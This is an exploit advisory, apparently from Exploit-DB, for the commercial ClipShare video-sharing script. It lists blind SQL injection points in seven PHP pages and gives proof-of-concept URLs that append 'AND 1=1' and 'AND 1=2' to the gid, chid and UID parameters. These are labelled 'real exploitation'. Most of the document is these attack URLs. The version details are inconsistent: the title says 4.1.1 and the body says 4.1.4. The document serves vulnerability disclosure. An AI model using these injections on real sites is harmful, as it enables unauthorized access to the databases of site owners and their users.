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ClipShare 4.1.1 - Multiples Vulnerabilites

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# Exploit Title: ClipShare 4.1.1 - Multiples Vulnerabilites
# Exploit Author: Esac
# Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
# Official site: http://www.clip-share.com
# Software License: Commercial.
#all versions are vulnerable:
#Last Checked: 27 March 2013

# Note : to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini)


vuln file : gvideos.php , param : gid

Poc :

http://server/mavideo/gvideos.php?gid=1 [Blind]

#to exlploit this poc , must group to be added previously with some videos publics

Real exploitation :

http://server/mavideo/gvideos.php?gid=1 AND 1=1

==> return normal page

http://server/mavideo/gvideos.php?gid=1 AND 1=2
==> return page with some errors ( or with nothing - white page )


vuln file : channel_detail.php , param : chid

Poc :

http://server/mavideo/channel_detail.php?chid=4 [Blind]

Real exploitation :

http://server/mavideo/channel_detail.php?chid=4 AND 1=1
==> return normal page

http://server/mavideo/channel_detail.php?chid=4 AND 1=2
==> return page with some errors ( or with nothing - white page )


vuln file : uprofile.php , param : UID

Poc :

http://server/mavideo/uprofile.php?UID=66 [Blind]

Real exploitation :

http://server/mavideo/uprofile.php?UID=66 AND 1=1
==> return normal page

http://server/mavideo/uprofile.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )


vuln file : ufavour.php , param : UID

Poc :

http://server/mavideo/ufavour.php?UID=66 [Blind]

Real exploitation :

http://server/mavideo/ufavour.php?UID=66 AND 1=1
==> return normal page

http://server/mavideo/ufavour.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )

vuln file : ufriends.php , param : UID

Poc :

http://server/mavideo/ufriends.php?UID=66 [Blind]

Real exploitation :

http://server/mavideo/ufriends.php?UID=66 AND 1=1
==> return normal page

http://server/mavideo/ufriends.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )

vuln file : uplaylist.php , param : UID

Poc :

http://server/mavideo/uplaylist.php?UID=66 [Blind]

Real exploitation :

http://server/mavideo/uplaylist.php?UID=66 AND 1=1
==> return normal page

http://server/mavideo/uplaylist.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )

vuln file : ugroups.php , param : UID

Poc :

http://server/mavideo/ugroups.php?UID=66 [Blind]

Real exploitation :

http://server/mavideo/ugroups.php?UID=66 AND 1=1
==> return normal page

http://server/mavideo/ugroups.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )


Tested version:
Sunday , March 27, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.
~ Game Over ~

Greetz : White Tarbouch Team & Cobra & Dami

==> Made In Moroco <==

Source: Exploit-DB

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